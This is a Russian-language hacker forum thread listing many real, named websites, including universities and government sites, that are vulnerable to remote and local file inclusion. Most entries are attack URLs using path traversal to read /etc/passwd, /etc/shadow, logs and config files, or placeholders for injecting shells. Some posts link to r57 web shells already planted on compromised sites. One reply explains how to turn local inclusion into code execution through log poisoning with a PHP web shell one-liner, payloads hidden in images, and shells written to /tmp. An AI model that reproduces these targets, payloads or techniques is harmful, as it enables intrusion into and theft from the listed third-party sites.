http://www.emandlo.com/archives/index.php?archive=[url]

http://www.diocesisalerno.it/index.php?p=[url]

http://www.chickentier.de/index.php?c=[url]

http://www.atelier-euterpe.net/index.php?lang=[url]

http://www.adamospizza.com/index.php?page=[url]

http://whereveradio.com/index.php?page=[url]

http://www.doopthemes.com/?page=/../../../../../../../etc/passwd%00

http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/passwd%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/shadow%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/hosts%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/ftpusers%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/syslog.conf%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/services%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/group%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/bash.bashrc%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/networks%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/profile%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/skel/.bashrc%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../etc/php4/apache/php.ini%00
http://www.kpk.gov.pl/stef/index.php?id=../../../../../../../../../../var/log/apache/error.log%00

http://www.cepr.be//home.php?pg=../../../../../../../../../../etc/passwd
http://www.cepr.be//home.php?pg=../../../../../../../../../../etc/hosts
http://www.cepr.be//home.php?pg=../../../../../../../../../../etc/ftpusers
http://www.cepr.be//home.php?pg=../../../../../../../../../../etc/services
http://www.cepr.be//home.php?pg=../../../../../../../../../../etc/group
http://www.cepr.be//home.php?pg=../../../../../../../../../../etc/networks
http://www.cepr.be//home.php?pg=../../../../../../../../../../etc/profile
http://www.cepr.be//home.php?pg=../../../../../../../../../../etc/skel/.bashrc
http://www.cepr.be//home.php?pg=../../../../../../../../../../usr/local/apache/conf/httpd.conf
...

http://gpi.savba.sk/modules.php?name=BD&op=Contrib&parCGG=../../../../../var/www/html/config.php%00

.....
http://www.atikuabubakar.net/index.php?page=/etc/passwd
http://www.atikuabubakar.net/index.php?page=/etc/hosts
http://www.atikuabubakar.net/index.php?page=/etc/syslog.conf
http://www.atikuabubakar.net/index.php?page=/etc/services
http://www.atikuabubakar.net/index.php?page=/etc/group
http://www.atikuabubakar.net/index.php?page=/etc/profile
http://www.atikuabubakar.net/index.php?page=/etc/bashrc
http://www.atikuabubakar.net/index.php?page=/etc/skel/.bashrc
http://www.atikuabubakar.net/index.php?page=/etc/php.ini
http://www.atikuabubakar.net/index.php?page=/etc/httpd/conf/httpd.conf
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/passwd
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/hosts
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/syslog.conf
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/services
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/group
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/profile
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/bashrc
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/skel/.bashrc
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/httpd/logs/error_log
http://jcmckay.net/cds.php?page=../../../../../../../../../../var/log/httpd/access_log
http://jcmckay.net/cds.php?page=../../../../../../../../../../var/log/httpd/error_log
http://jcmckay.net/cds.php?page=../../../../../../../../../../etc/httpd/conf/httpd.conf
http://nofrillz.netcore2k.net/index.php?page=../../../../../../../../../../etc/passwd
http://nofrillz.netcore2k.net/index.php?page=../../../../../../../../../../etc/hosts
http://nofrillz.netcore2k.net/index.php?page=../../../../../../../../../../etc/syslog.conf
http://nofrillz.netcore2k.net/index.php?page=../../../../../../../../../../etc/services
http://nofrillz.netcore2k.net/index.php?page=../../../../../../../../../../etc/group
http://nofrillz.netcore2k.net/index.php?page=../../../../../../../../../../var/log/error_log
http://nofrillz.netcore2k.net/index.php?page=../../../../../../../../../../etc/httpd.conf
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/passwd
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/hosts
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/ftpusers
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/syslog.conf
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/services
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/group
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/profile
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/bashrc
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/skel/.bashrc
http://www.ccmhdiabetes.net/links.php?page=../../../../../../../../../../etc/httpd/conf/httpd.conf
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/passwd
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/hosts
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/ftpusers
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/services
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/group
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/profile
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/bashrc
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/skel/.bashrc
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/httpd/logs/error_log
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../var/log/httpd/error_log
http://www.artandarch.net/arch/template.php?page=../../../../../../../../../../etc/httpd/conf/httpd.conf
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/passwd
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/hosts
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/ftpusers
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/syslog.conf
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/services
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/group
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/bash.bashrc
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/networks
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/profile
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/skel/.bashrc
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/php4/apache/php.ini
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/php4/cgi/php.ini
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.fontenay-aux-roses.net/ress.php?page=../../../../../../../../../../etc/apache/conf/httpd.conf
http://monclub.net/ASSundhoffen/index.php?page=../../../../../../../../../../etc/passwd
http://monclub.net/ASSundhoffen/index.php?page=../../../../../../../../../../etc/hosts
http://monclub.net/ASSundhoffen/index.php?page=../../../../../../../../../../etc/services
http://monclub.net/ASSundhoffen/index.php?page=../../../../../../../../../../etc/group
http://monclub.net/ASSundhoffen/index.php?page=../../../../../../../../../../etc/bash.bashrc
http://monclub.net/ASSundhoffen/index.php?page=../../../../../../../../../../etc/profile
http://monclub.net/ASSundhoffen/index.php?page=../../../../../../../../../../etc/skel/.bashrc
http://monclub.net/ASSundhoffen/index.php?page=../../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.katiedavis.net/archives.php?page=/../../../../../../../../../../etc/passwd
http://www.katiedavis.net/archives.php?page=/../../../../../../../../../../etc/hosts
http://www.katiedavis.net/archives.php?page=/../../../../../../../../../../etc/syslog.conf
http://www.katiedavis.net/archives.php?page=/../../../../../../../../../../etc/services
http://www.katiedavis.net/archives.php?page=/../../../../../../../../../../etc/group
http://www.katiedavis.net/archives.php?page=/../../../../../../../../../../etc/profile
http://www.katiedavis.net/archives.php?page=/../../../../../../../../../../etc/bashrc
http://www.katiedavis.net/archives.php?page=/../../../../../../../../../../etc/skel/.bashrc
http://www.keithnovak.net/index.php?page=../../../../../../../../../../etc/passwd
http://www.keithnovak.net/index.php?page=../../../../../../../../../../etc/hosts
http://www.keithnovak.net/index.php?page=../../../../../../../../../../etc/syslog.conf
http://www.keithnovak.net/index.php?page=../../../../../../../../../../etc/services
http://www.keithnovak.net/index.php?page=../../../../../../../../../../etc/group
http://www.keithnovak.net/index.php?page=../../../../../../../../../../etc/profile
http://www.keithnovak.net/index.php?page=../../../../../../../../../../etc/bashrc
http://www.keithnovak.net/index.php?page=../../../../../../../../../../etc/skel/.bashrc
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/passwd
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/hosts
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/ftpusers
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/syslog.conf
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/services
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/group
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/bash.bashrc
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/profile
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/skel/.bashrc
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/php/php.ini
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/php/cgi/php.ini
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/php5/cgi/php.ini
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/httpd/httpd.conf
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/http/httpd.conf
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../etc/httpd.conf
http://www.thebestlifeever.net/index.php?page=../../../../../../../../../../var/www/conf/httpd.conf

http://www.loading-zone.org/site.php?page=
...

add

http://www.retabo.be/site/cont/index.php?cont=
куча сайтов на хостере....


+

http://www.trendula.de/index.php?cont=

open.goopy.ru
http://open.goopy.ru/index.php?s=[сдались на милость врага]

http://gwyneth-kraeuterladen.de/start.php?page=[INCLUDE]
http://www.fuchs-johann.de/index.php?page=[INCLUDE]
http://www.agrowebcee.net/subnetwork/nacee/rus/indexru.php?page=[INCLUDE]
http://www.teachmemusic.be/index.php?page=[INCLUDE]
http://www.isad.fr/index.php?page=[INCLUDE]
http://www.alhuossam.com/index.php?page=[INCLUDE]
http://afnet.uniag.sk/~chlebo/english/index.php?page=[INCLUDE]
http://www.algerie-meteo.com/imprimer.php?ville=&vname=&cat=[INCLUDE]
http://www.alpenrosekippel.ch/index3.php?site=[INCLUDE]
http://oscar.com.ua/index.php?action=[INCLUDE]
http://www.cc-club.ch/info.php?var=[INCLUDE]
http://www.demokrathukukcular.com/altsayfa.php?sayfa=[INCLUDE]
http://www.muratciftkaya.com/altsayfa.php?sayfa=[INCLUDE]
http://www.gokada.com/?sayfa=[INCLUDE]
http://demokrathukukcular.com/altsayfaiktibaslar.php?sayfa=[INCLUDE]
http://crbottomfeeders.synforever.net/index.php?id=[INCLUDE]
http://www.ihre-service-agentur.de/stadtnews24/hpmaker/index.php?p=[INCLUDE]
http://www.ventex2000.ru/index.php?act=[INCLUDE]
http://energoprom.org.ua/rus.php?inc=[INCLUDE]
http://atlantic-pool.de/indexflash2.php?a=[INCLUDE]
http://www.webstudio.lviv.ua/index.php?c=[INCLUDE]
http://www.dna-sequencing.org/display.php?cat=[INCLUDE]
http://www.cci.setif.org/index.php?cat=[INCLUDE]
http://www.sitifis.com/index.php?cat=[INCLUDE]
http://www.oriental-production.com/index.php?cat=[INCLUDE]
http://www.stoffy.com/almera-tuning-neu/index1.php?site=[INCLUDE]
http://www.tvverl.de/unten.php?site=[INCLUDE]
http://www.erothoughts.com/main/index.php?site=[INCLUDE]
http://www.ammin.uniss.it/Segreterie_Studenti/index.php?page=[INCLUDE]
http://www.dark-metal.de/bsdrevamped/index.php?show=[INCLUDE]
http://www.rocksanne.de/content.php?cont=[INCLUDE]
http://www.girlswantporn2.com/gwp2header.php?content=[INCLUDE]
http://www.recoaroterme.net/pagina.php?link=[INCLUDE]
http://www.sojep.com.br/index.php?pag=[INCLUDE]
http://www.rocksanne.de/content.php?cont=[INCLUDE]
http://sicurezza.uniss.it/index.php?p=[INCLUDE]
http://www.kuechen-schmitz.de/index.php?show=[INCLUDE]
http://koti.mbnet.fi/usoft/viewpage.php?page=[INCLUDE]
http://barcode.psoft.sk/en/index.php?file=[INCLUDE]
http://www.easyusloans.com/index.php?goto=[INCLUDE]
http://www.sojep.com.br/index.php?pag=[INCLUDE]
http://www.bombaslovakia.sk/index.php?action=[INCLUDE]
http://www.efos.hr/efos_news/index1.php?str=[INCLUDE]
http://www.ceadmex.org/Proyectos_Senalizacion.php?secc=sena&pag=[INCLUDE]
http://www.dan-marius.ro/navigare.php?ce=prozaSF&care=furnizorul_de_vise&limba=romana&obiect=[INCLUDE]
http://www.relab.sk/stranka.php?vt=1&file=[INCLUDE]
http://www.dollzbg.com/indexbg.php?dir=[INCLUDE]
http://www.ekd.de/staatskirchenrecht/suche/display.php3?Datei=[INCLUDE]
http://www.maseraticlub.com/mainsite/home.php?lang=ita&fname=[INCLUDE]
http://www.exac.cz/Pinnacle/product2.php?label=MediaCenter%20310i&soubor=[INCLUDE]
http://www.vychod.sk/rk7/index.php?page=[INCLUDE]
http://trofimov.org.ua/index.php?[INCLUDE]
http://www.relab.sk/stranka.php?vt=0&file=[INCLUDE]
http://hradistskadvojka.iglu.cz/photos.php?url1=[INCLUDE]
http://www.exac.cz/Pinnacle/product5.php?label=Studio%20Plus%2010&soubor=[INCLUDE]
http://www.minprom.bashkortostan.ru/__print.php?link=[INCLUDE]
http://www.motulpisti.hu/index.php?cmd=[INCLUDE]
http://afnet.uniag.sk/~chlebo/english/index.php?page=[INCLUDE]
http://proficonsult.ru/newsnum.php?num=[INCLUDE]
http://www.algerie-meteo.com/imprimer.php?ville=&vname=&cat=[INCLUDE]
http://www.cav.co.th/en/index.php?page=[INCLUDE]
http://www.siroweb.de/index.php?link=4&seite=[INCLUDE]
http://www.efos.hr/efos_news/index1.php?str=[INCLUDE]
http://iaald.org/cee/index.php?page=[INCLUDE]
http://findcreditcard.net/index.php?page=[INCLUDE]
http://www.teamtransitmix.com/index.php?page=[INCLUDE]
http://www.wimbledonbooksandmusic.co.uk/index.php?page=[INCLUDE]
http://www.fais.com.my/content.php?pg=[INCLUDE]
http://www.cbtij.org.br/home.php?page=[INCLUDE]
http://www.bookdjralph.com/index.php?Page=[INCLUDE]
http://www.sirajakredit.com/RK/z_view.php?page=[INCLUDE]
http://www.prudenteempresas.com.br/?inc=[INCLUDE]
http://www.internaatmechelen.be/ideebox/include.php?gorumDir=[INCLUDE]
http://www.gdc.am/bio/?action=[INCLUDE]
http://www.awards.anchik.com/index.php?go=[INCLUDE]
http://www.vilapropicio.go.gov.br/index.php?home_name=[INCLUDE]
http://www.samosir.go.id/detail_eng.php?id=2&subid=14&klik=2&kat=On%20duty%20Tourism%20and%20Communication&buka=[INCLUDE]
http://www.webmuur.nl/index.php?pagina=moppen/index&p=[INCLUDE]
http://www.redheendran.com/images/show.php?dir=[INCLUDE]
http://www.hostel.org.br/ingles/home_ingles.php?secao=[INCLUDE]
http://www.i2.com.ua/index.php?dir=finance&page=[INCLUDE]
http://www.ridvanbeder.com/index.php?msayfa=hlistele&sayfa=[INCLUDE]
http://www.jakautos.co.uk/index.php?id=[INCLUDE]
http://www.dragonballmaster.com/index.php?id=[INCLUDE]

WIN

http://www.accessibleportugal.com/en/main.php?content=

arizona.edu
The University of Arizona.

http://math.arizona.edu/~msalomone/?p=../../../etc/hosts
http://math.arizona.edu/~msalomone/?p=../../../etc/passwd
http://math.arizona.edu/~msalomone/?p=../../../etc/syslog.conf

Немного еды :)
http://teaching.iub.edu/finder/wrapper.php?inc_id=[LOCAL INCLUDE]
http://www.augustana.edu/its/patches/threats.php?info_file=[LOCAL INCLUDE]
http://alumni.uindy.edu/alumnimap/state.php?page=[LOCAL INCLUDE]
http://anthenv.web.arizona.edu/Officers.php?Role=Secretalry&Bio=[LOCAL INCLUDE]
http://transmedia.syr.edu/index.php?content_file=[LOCAL INCLUDE]
http://www.clarkson.edu/armyrotc/alumni.php?fileName=[LOCAL INCLUDE]
http://www.students.missouri.edu/~hkn/view%20comment.php?file=[LOCAL INCLUDE]
http://cgi.stanford.edu/group/segwa/cgi-bin/event.php?file=[LOCAL INCLUDE]
http://www.biology.utah.edu/bionews2.php?story=[LOCAL INCLUDE]
http://webmail2.vermontlaw.edu/frame.php?tab=printing&center=[LOCAL INCLUDE]
http://library.udayton.edu/c/pf.php?p=[LOCAL INCLUDE]
http://www.cs.utb.edu/vibrg/main.php?page=[LOCAL INCLUDE]
http://www.cs.utb.edu/main.php?page=[LOCAL INCLUDE]
http://pages.slc.edu/~mpower/index.php?page=[LOCAL INCLUDE]
http://activities.tjhsst.edu/dps/newmain.php?p=[LOCAL INCLUDE]
http://library.ssec.wisc.edu/resources/news/news.php?htm=[LOCAL INCLUDE]

http://www.icppc.pl/eng/index.php?id=[SHELL]
http://www.nielsfrevert.de/guestbook/index.php?id=[SHELL]
http://www.urlaub-suche24.de/links/index.php?id=[SHELL]
http://www.mord-ist-ihr-hobby.de/gb/index.php?id=[SHELL]
http://www.infosportnet.de/dtts/index.php?id=[SHELL]

Еда на ланч ;)
http://herot.engin.umich.edu/status/backup/bymachine/index.php?computer=[INCLUDE]

:)
http://www.wnhs.org/athletics/index.php?page=wrestling&lvl=[INCLUDE]
http://www.euro-goldfinance.com/pages.php?page=[INCLUDE]
http://www.hentai.sotao.net/index.php?page=[INCLUDE]
http://www.getanyloananytime.com/submain.php?page=[INCLUDE]
http://bgrod.org/medicina/index.php?p=[INCLUDE]
http://www.jongenstromp.nl/content.php?p=[INCLUDE]
http://greatriverloghomes.com/start.php?p=[INCLUDE]
http://graevling.net/index.php?inc=[INCLUDE]
http://www.standoutriot.co.uk/area51/index.php?p=[INCLUDE]
http://alazarenuruguay.com/index.php?a=2006&m=06&p=[INCLUDE]
http://www.conoceabasolo.gob.mx/gaceta/index.php?a=sp&p=[INCLUDE]
http://www.buzz.ir/page.php?s=[INCLUDE]
http://medieval-kingdom.com/kingdom.php?x=[INCLUDE]
http://www.ketchmark.com/netscape1.php?content=[INCLUDE]
http://www.reichardt-feinmechanik.de/index.php?action=[INCLUDE]
http://www.perfecthooker.com/index.php?page=[INCLUDE]
http://www.reflectas.com.au/index.php?page=[INCLUDE]
http://www.melrosecafe.com/index.php?page=[INCLUDE]

http://www.folkswandertage.de/2007/events/index.php?page=../../../../../../../../etc/passwd
http://www.folkswandertage.de/2007/events/index.php?page=../../../../../../../../etc/hosts
http://www.folkswandertage.de/2007/events/index.php?page=../../../../../../../../etc/services
http://www.folkswandertage.de/2007/events/index.php?page=../../../../../../../../etc/group
http://www.folkswandertage.de/2007/events/index.php?page=../../../../../../../../etc/profile

http://www.sunradio.info/musikwunsch/index.php?id=../../../../../etc/passwd
http://www.sunradio.info/musikwunsch/index.php?id=../../../../../etc/hosts
http://www.sunradio.info/musikwunsch/index.php?id=../../../../../etc/ftpusers
http://www.sunradio.info/musikwunsch/index.php?id=../../../../../etc/services
http://www.sunradio.info/musikwunsch/index.php?id=../../../../../etc/group
http://www.sunradio.info/musikwunsch/index.php?id=../../../../../etc/networks
http://www.sunradio.info/musikwunsch/index.php?id=../../../../../etc/profile

http://ea3740.univ-lyon1.fr/index.php?cat=[url]

http://ckvalaska.cz/2007/index.php?co=[url]

http://www.x-siter.net/index.php?id=[url]

http://www.wxeventos.com.br/index2.php?pag=[url]

Powermail

http://www.powermail.in/?cmd=Shell.txt?

Ахтунг :)
http://www.rocksanne.de/content.php?cont=[INCLUDE]
http://wsuonline.de/php/bereiche/ferienlager/getpage8.php?group=ferienlager&page=[INCLUDE]
http://www.dr-nikolaus.de/index2.php?s=[INCLUDE]
http://www.hertha-aisch.de/main.php?id=administration&handler=[INCLUDE]
http://www.whs-leipzig.de/index.php?menue=Projekte&content=main.html&subcontent=[INCLUDE]
http://www.suckforsympathy.de/index.php?file=[INCLUDE]
http://www.siroweb.de/index.php?link=4&seite=[INCLUDE]
http://www.faller.de/start.php?lang=dt&naviUp=6&naviDown=5&page=[INCLUDE]
http://www.ihre-service-agentur.de/stadtnews24/hpmaker/index.php?p=[INCLUDE]
http://www.kgvanderlangenbuende.de/index.php?page=[INCLUDE]

romeguide.it
http://www.romeguide.it/index2.php?pag=[url]

наткнулся на сайтец

http://www.spartak-kostroma.org/news.php?news_id=../../../../etc/passwd

http://www.sodepau.org/cat/index.php?id=../../../../../etc/passwd
http://www.sodepau.org/cat/index.php?id=../../../../../etc/hosts
http://www.sodepau.org/cat/index.php?id=../../../../../etc/services
http://www.sodepau.org/cat/index.php?id=../../../../../etc/group
http://www.sodepau.org/cat/index.php?id=../../../../../etc/profile

будьте внимательны, и получите шелл ;-) а там
Free space : 1550.16 GB Total space: 1805.85 GB

http://austin.smallplanetguide.com/rentals/index.php?p=

Локальный инклудинг


http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/passwd
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/ftpusers
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/hosts
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/group
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/services
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/profile


я ничего не смог там сделать(

тож локалка
http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd

Обьясните мне плз в чем смысл находить etc/passwd?

WindowS =)

http://israndom.com/default.php?content=

Ru

http://www.gumanitarij.ru/newsite/default.php?content=

ps: обычно смысл в том,что в passwd пути к папкам юзеров. также можн опопробовать связки логин пароль на фтп,БД и т.д. )

тож локалка
http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd

Обьясните мне плз в чем смысл находить etc/passwd?

Смысл в том, что /etc/passwd есть на любой nix-ОС и если получилось его заинклюдить (как вариант прочитать), то значит как минимум локальный инклюд есть (я не беру вариант с опенбэйздир) и не надо подбирать путьк нему, т.к. при любом (большом) количестве /../ ты всеравно его прочитаешь (потому что выше рута / не прыгнешь), а дальше все, что подскажет тебе воображение...
например есть локальный инклюд, ты можешь:

1) прочитать и использовать passwd файл для брута по маске login:login (к тому же узнать путь к домашним директориям пользователей, иногда очень нужно)

2) узнав методом перебора стандартных путей путь к логам апача, ты можешь намеренно вызвать ошибку, записать к примеру в error_log php код а потом этот error_log проинклюдить (заметь локально) и соответственно этот код выполнить (например элементарный веб-шелл <?php system($_GET[cmd]); ?>)

3) если на сайте есть возможность заливки картинок, то ты можешь вставить php код в gif или в Exif данные jpeg картинки, а потом с помошью все того же локального инклюда выполнить этот код (проинклюдив картинку)

4) Есть у тебя к примеру SQL инъекция и у пользователя БД есть права filepriv, но ты не можешь записать шелл т.к. незнаешь путей, или нет ни одной паки доступной из веба с правами на запись, в первом случае ты можешь прочитать файл httpd.conf (если найдешь, и если будут права на чтение) и узнать пути, хотя это можно сделать и через sql-inj, при втором варианте ты пишешь свой шелл в /tmp и с помощью локального инклюда подцепляешь свой шелл из /tmp

5) куча вариантов, насколько фантазии хватит


Если есть просто читалка файлов, то ты можешь посмотреть файлы конфигурации на сайте и узнать пароль и пользователя БД (обычно они в незашифрованном виде)

ну надеюсь ты понял...

да, огромное спс!

Windows NT DS-31077-1 5.2 build 3790

http://nyec.modernsignal.net/content/documents/document2.php

-----

http://www.ncti-india.com/ncti-archive/txtfiles/roki.php
http://sayko-esrarci.com/r57.php
http://milfmuncher.net/dump.php
http://www.karizmatikshow.com/zzz.php
http://pp.dhbl.org/phpshell/r57.php
http://myauction.us/banners/r57shel.jpg.pdf.swf.php
http://www.wshakespeare.net/images/r57shell.htm

Free space : 1665.75 GB Total space: 3209.17 GB

этот shell.php сразу в глаза бросилса...ну и названьице))
http://www.gracestillwater.us/shell.php?content=

http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/passwd
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/hosts
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/group
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/services
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/profile
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/syslog.conf

http://www.iswizards.com/index.php?PAGE=../../../../etc/passwd
http://www.iswizards.com/index.php?PAGE=../../../../etc/hosts
http://www.iswizards.com/index.php?PAGE=../../../../etc/group
http://www.iswizards.com/index.php?PAGE=../../../../etc/services
http://www.iswizards.com/index.php?PAGE=../../../../etc/profile
http://www.iswizards.com/index.php?PAGE=../../../../etc/syslog.conf

http://www.whototake.com/index.php?page=../../../../../etc/passwd
http://www.whototake.com/index.php?page=../../../../../etc/hosts
http://www.whototake.com/index.php?page=../../../../../etc/group
http://www.whototake.com/index.php?page=../../../../../etc/services
http://www.whototake.com/index.php?page=../../../../../etc/profile
http://www.whototake.com/index.php?page=../../../../../etc/syslog.conf

http://deine-lernlinks.de/index.php?page=../../../../../etc/passwd
http://deine-lernlinks.de/index.php?page=../../../../../etc/hosts
http://deine-lernlinks.de/index.php?page=../../../../../etc/group
http://deine-lernlinks.de/index.php?page=../../../../../etc/services

http://www.aiongenesis.com/index.php?page=../../../../../etc/passwd
http://www.aiongenesis.com/index.php?page=../../../../../etc/hosts
http://www.aiongenesis.com/index.php?page=../../../../../etc/group
http://www.aiongenesis.com/index.php?page=../../../../../etc/services
http://www.aiongenesis.com/index.php?page=../../../../../etc/profile
http://www.aiongenesis.com/index.php?page=../../../../../etc/syslog.conf

http://www.sodepau.org/cat/index.php?id=../../../../../../etc/passwd
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/hosts
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/group
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/services
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/profile
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/syslog.conf

http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/passwd
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/hosts
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/group
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/services
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/profile

http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/passwd
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/hosts
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/group
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/services
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/profile

http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/passwd
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/hosts
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/group
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/services
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/profile
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/syslog.conf

http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/passwd
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/hosts
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/group
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/services
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/profile

http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/passwd
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/hosts
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/group
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/services
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/profile
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/syslog.conf

_-_
http://pages.minot.k12.nd.us/nodak/downtown/index.php?content=

_-_

http://www.redeuniversidade.com.br/rede/vitoria/link.php?pagina=[url]

http://www.vitoriaveiculos-rs.com/default.php?p=[url]

Могет и боян, но это антибоян пока найдёшь весь трафик уплывёт :(
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/passwd
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/hosts
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/ftpusers
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/syslog.conf
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/services
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/group
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/bash.bashrc
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/networks
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../etc/profile
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.dsinsight.com/principal.php?menu=9&abrir=../../../../../../../../../../etc/passwd
http://www.dsinsight.com/principal.php?menu=9&abrir=../../../../../../../../../../etc/hosts
http://www.dsinsight.com/principal.php?menu=9&abrir=../../../../../../../../../../etc/services
